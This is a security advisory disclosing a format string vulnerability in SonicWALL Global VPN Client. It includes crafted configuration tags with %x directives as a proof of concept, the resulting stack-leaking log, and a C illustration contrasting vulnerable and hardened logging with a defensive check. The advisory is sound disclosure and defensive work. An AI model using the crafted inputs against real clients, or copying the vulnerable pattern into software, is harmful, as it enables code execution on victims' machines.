SEC Consult Security Advisory < 20071204-0 >
=====================================================================================
title: SonicWALL Global VPN Client Format String Vulnerability
program: SonicWALL Global VPN Client
vulnerable version: < 4.0.0.830
homepage: www.sonicwall.com
found: 06-12-2007
by: lofi42*
=====================================================================================
Vendor description:
---------------
The SonicWALL Global VPN Client provides mobile users with access to mission-critical network resources by establishing secure connections to their office network's IPSec-compliant SonicWALL VPN gateway.
Vulnerability overview:
---------------
SonicWALL Global VPN Client suffers from a format string vulnerability that can be triggered by supplying a specially crafted configuration file. This vulnerability could allow an attacker to execute arbitrary code in the context of the vulnerable client. For a successful attack, the attacker would have to entice his victim into importing the special configuration file.
Vulnerability details:
---------------
Format string errors occur when the client parses the "name" attribute of the "Connection" tag and the content of the "HostName" tags in the configuration file.
Examples:
<Connection name=%s%s%s%s>
<HostName>%s%s%s%s</HostName>
The bugs have been verified in versions 3.1.556 and 4.0.0.810. With version 3.1.556 the client has to initiate a connection to trigger the vulnerability, whereas with beta version 4.0.0.810 the bug can be exploited simply by double-clicking the configuration file. This is because the 4.0 version tries to write the imported configuration to an extra debug log.
Proof-of-concept:
---------------
In 4.0.0.810, the bug can be beautifully demonstrated by supplying a crafted config file and then viewing the debug logfile. A configuration like this...
<Connection name=> AAAAAAAAAA%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x
<HostName> BBBBBBBBBB%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x
...yields the following logfile:
----------------------< Connection name >-----------------------------------
OnLogMessage(): 'The connection "AAAAAAAAAAe64d20.37327830.46413139.
203a3833.782b8d00.6f4c6e4f.73654d67.65676173.203a2928.65685427.
6e6f6320.7463656e.206e6f69.41414122.41414141.25414141" has been enabled.' ''
----------------------</Connection name >-----------------------------------
----------------------<HostName>--------------------------------------------
BBBBBBBBBB656d616e.41414120.41414141.25414141.78252e78.2e78252e.252e7825.
78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.
74207825.6e61206f.20504920.72646461.2e737365.42272027.42424242.42424242'
----------------------</HostName>---------------------------------------
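The following C program is an added illustration and not SonicWALL code; it models the defect described in the vulnerability details and the log entry shown in the proof-of-concept above. The logger name on_log_message(), the message layout and the two wrapper functions are assumptions chosen to mirror the 'The connection "..." has been enabled.' line. It shows the vulnerable pattern (an imported value ends up as the printf-style format string), the hardened pattern (a constant format with the value passed as a %s argument), and a simple import-time check a defender can use to flag configuration files whose name or hostname fields contain conversion directives.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical logger (assumption): like the client's OnLogMessage(), it
 * treats its first argument as a printf-style format string. The formatted
 * text is written to 'out' so the result can be inspected. */
static int on_log_message(char *out, size_t outsz, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int n = vsnprintf(out, outsz, fmt, ap);
    va_end(ap);
    return n;
}

/* Vulnerable pattern: the message is assembled first and then handed to the
 * logger as its format string, so any '%' sequences in the connection name
 * are interpreted as conversions (which is how the "%x.%x..." PoC dumps
 * stack words into the debug log). */
int log_enabled_vulnerable(char *out, size_t outsz, const char *conn_name)
{
    char msg[256];
    snprintf(msg, sizeof msg, "The connection \"%s\" has been enabled.", conn_name);
    return on_log_message(out, outsz, msg);  /* msg becomes the format string */
}

/* Hardened pattern: the format string is a compile-time constant and the
 * untrusted value is always passed as a %s argument, so a '%' in the name is
 * copied literally into the log. */
int log_enabled_hardened(char *out, size_t outsz, const char *conn_name)
{
    return on_log_message(out, outsz,
                          "The connection \"%s\" has been enabled.", conn_name);
}

/* Defensive import check: count printf conversion directives in an imported
 * value. "%%" is a literal percent sign and is not counted. A non-zero count
 * in a connection name or hostname is a strong sign of a crafted file and a
 * reasonable reason to reject the import or raise an alert. */
int count_format_directives(const char *s)
{
    int n = 0;
    while (*s) {
        if (*s == '%') {
            if (s[1] == '%') { s += 2; continue; }  /* escaped percent */
            n++;
        }
        s++;
    }
    return n;
}

int main(void)
{
    /* Constructed sample value in the style of the advisory's PoC. */
    const char *crafted = "AAAAAAAAAA%x.%x.%x.%x";
    char buf[512];

    log_enabled_hardened(buf, sizeof buf, crafted);
    printf("hardened log entry: %s\n", buf);
    printf("format directives in name: %d\n", count_format_directives(crafted));
    return 0;
}
```

The vulnerable variant is kept only to show the shape of the bug; it is deliberately never called with a crafted value here, since that would be undefined behaviour. Note that because on_log_message() carries no format attribute, a compiler will not warn about the non-constant format string, which is exactly why this class of bug survives review: the fix is to never let data cross into the format-string position, and to validate imported fields before they reach any logging path.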
vendor status:
---------------
vendor notified: 2007-08-16
vendor response: 2007-08-29
patch available: 2007-11-26
The issue has been fixed in SonicWALL Global VPN Client 4.0.0.830.